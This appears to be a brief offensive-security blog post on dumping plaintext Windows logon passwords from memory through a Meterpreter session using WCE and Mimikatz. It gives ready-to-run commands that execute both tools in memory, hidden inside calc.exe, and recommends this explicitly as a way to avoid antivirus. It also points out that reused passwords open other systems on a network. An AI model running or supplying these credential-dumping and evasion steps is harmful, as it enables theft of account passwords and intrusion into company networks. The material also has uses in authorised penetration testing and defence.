While hashes are great and passing the hash is an effective attack method it never hurts to have plain text passwords. Companies tend to reuse passwords on various systems or use the same password style across their network.
Currently the two primary tools for doing this are WCE and Mimikatz both methods will be shown over an existing meterpeter session.
First up WCE the old way dropping a binary
As you can see this involves dropping a binary to the target machine.
Time to take a look at the execute command
-m looks like a fun option
Running in memory will give you a better chance of anti virus avoidance.
Lets try WCE again without dropping the binary
execute -H -i -c -m -d calc.exe -f /root/wce.exe -a -w
Next up Mimikatz
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a ‘”sekurlsa::logonPasswords full” exit’
While both of these are executed in memory WCE writes a DLL to disk when its running. Mubix has a detailed blog post on Mimikatz in memory this gives Mimikatz a great advantage over WCE since it never touches disk.
More information on in memory execuction can be found here – Eternal Sunshine of the Spotless RAM
Mimikatz – http://blog.gentilkiwi.com/mimikatz
Mimikatz english version – https://github.com/thomhastings/mimikatz-en
Windows Credential Editor(WCE) – http://www.ampliasecurity.com/research.html
Metasploit – http://www.metasploit.com/download/